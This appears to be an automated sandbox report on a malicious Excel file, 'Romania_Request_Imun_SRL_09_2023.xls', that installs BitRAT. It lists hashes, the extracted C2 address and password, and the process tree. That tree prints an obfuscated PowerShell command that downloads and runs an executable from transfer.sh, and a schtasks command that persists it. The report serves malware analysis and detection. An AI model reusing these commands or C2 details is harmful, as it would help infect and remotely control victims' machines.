Analysis

  • max time kernel
    71s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:14

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    968a96fab78010b987e7a0b8624d2605

  • SHA1

    1e42b6186f040b9868a978450fde05e39a267bf3

  • SHA256

    63e7d413f4653c4b84c8e4c1c4fd4516a245464b3e996aa733ce21c9c1c964b1

  • SHA512

    f953916293565e59e94f2671ef4798eff19d7ff965570d66682c38aeca273331735b638b03653960838bbfac15333364dbfb477135d298d25690b8a95fb65a75

  • SSDEEP

    3072:irxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAftJE2zuxq+fr9wBLa71ba2ryLTHeYB:kxEtjPOtioVjDGUU1qfDlavx+W2QnAVF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Users\Public\iq5kz.exe
          "C:\Users\Public\iq5kz.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Users\Public\iq5kz.exe
            "C:\Users\Public\iq5kz.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3740
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
            5⤵
              PID:4768
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\iq5kz.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
              5⤵
                PID:4476
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4504
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
        1⤵
        • Creates scheduled task(s)
        PID:2128
      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        C:\Users\Admin\AppData\Roaming\pint\pint.exe
        1⤵
        • Executes dropped EXE
        PID:3820

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iuv154va.fg4.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        364KB

        MD5

        23865e3b619eaf7bebedff2a995165ec

        SHA1

        c078f5485ca2edbf48443f94594854ad8a625245

        SHA256

        ff80962d25de66c8a97e517e6884cfcfb6a181ee23773d6b02b617656d85e5c5

        SHA512

        d105155a858f617e3f2de61acf472d8bdb03b641fc29593b99e894fb08589b1a9b1c117a34560b399db0440ba4ae425df0a754dac7f956384501757a07daebd0

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        64KB

        MD5

        19c0ef335f12ab39add6e7802edf6c8a

        SHA1

        4b35efb2c02dff6bb695cdc57dcffe8fe600d271

        SHA256

        e10a7518b9ebea7e3c4d143ef389b71f428d63cb8e028f22645ab715130af199

        SHA512

        59d4eb8f96da5121a1aec5011bf57bf5bbaf22b6ea863c011834391a10cc5676fe8691ecc96add7ab66231a3f1fd2009826c73b5344cfff397fd81ef880cc52e

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\iq5kz.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\iq5kz.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\iq5kz.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • memory/3300-0-0x00007FFD7DAD0000-0x00007FFD7DAE0000-memory.dmp
        Filesize

        64KB

      • memory/3300-12-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-9-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-11-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-10-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-13-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-14-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-16-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-15-0x00007FFD7B960000-0x00007FFD7B970000-memory.dmp
        Filesize

        64KB

      • memory/3300-17-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-19-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-20-0x00007FFD7B960000-0x00007FFD7B970000-memory.dmp
        Filesize

        64KB

      • memory/3300-22-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-21-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-18-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-5-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-29-0x000001CF97A20000-0x000001CF98220000-memory.dmp
        Filesize

        8.0MB

      • memory/3300-30-0x000001CF97A20000-0x000001CF98220000-memory.dmp
        Filesize

        8.0MB

      • memory/3300-8-0x00007FFD7DAD0000-0x00007FFD7DAE0000-memory.dmp
        Filesize

        64KB

      • memory/3300-6-0x00007FFD7DAD0000-0x00007FFD7DAE0000-memory.dmp
        Filesize

        64KB

      • memory/3300-7-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-1-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-4-0x00007FFD7DAD0000-0x00007FFD7DAE0000-memory.dmp
        Filesize

        64KB

      • memory/3300-45-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-46-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-47-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-48-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3300-52-0x000001CF97A20000-0x000001CF98220000-memory.dmp
        Filesize

        8.0MB

      • memory/3300-53-0x000001CF97A20000-0x000001CF98220000-memory.dmp
        Filesize

        8.0MB

      • memory/3300-2-0x00007FFD7DAD0000-0x00007FFD7DAE0000-memory.dmp
        Filesize

        64KB

      • memory/3300-3-0x00007FFDBDA50000-0x00007FFDBDC45000-memory.dmp
        Filesize

        2.0MB

      • memory/3740-91-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-89-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-115-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-114-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-113-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-112-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-110-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-109-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-72-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-108-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-107-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-77-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-74-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-106-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-82-0x0000000074AE0000-0x0000000074B19000-memory.dmp
        Filesize

        228KB

      • memory/3740-83-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-84-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-86-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-87-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-88-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-105-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-90-0x0000000074E80000-0x0000000074EB9000-memory.dmp
        Filesize

        228KB

      • memory/3740-103-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-92-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-93-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-94-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-99-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-100-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-101-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3740-102-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5036-58-0x000001DCA77A0000-0x000001DCA77B0000-memory.dmp
        Filesize

        64KB

      • memory/5036-59-0x000001DCA77A0000-0x000001DCA77B0000-memory.dmp
        Filesize

        64KB

      • memory/5036-44-0x000001DCA77A0000-0x000001DCA77B0000-memory.dmp
        Filesize

        64KB

      • memory/5036-43-0x000001DCA77A0000-0x000001DCA77B0000-memory.dmp
        Filesize

        64KB

      • memory/5036-54-0x00007FFD95650000-0x00007FFD96111000-memory.dmp
        Filesize

        10.8MB

      • memory/5036-37-0x000001DCA9330000-0x000001DCA9352000-memory.dmp
        Filesize

        136KB

      • memory/5036-42-0x00007FFD95650000-0x00007FFD96111000-memory.dmp
        Filesize

        10.8MB

      • memory/5036-66-0x00007FFD95650000-0x00007FFD96111000-memory.dmp
        Filesize

        10.8MB

      • memory/5072-78-0x0000000074BD0000-0x0000000075380000-memory.dmp
        Filesize

        7.7MB

      • memory/5072-68-0x0000000074BD0000-0x0000000075380000-memory.dmp
        Filesize

        7.7MB

      • memory/5072-69-0x00000000005A0000-0x0000000000978000-memory.dmp
        Filesize

        3.8MB

      • memory/5072-70-0x0000000005A20000-0x0000000005FC4000-memory.dmp
        Filesize

        5.6MB

      • memory/5072-71-0x0000000005460000-0x0000000005470000-memory.dmp
        Filesize

        64KB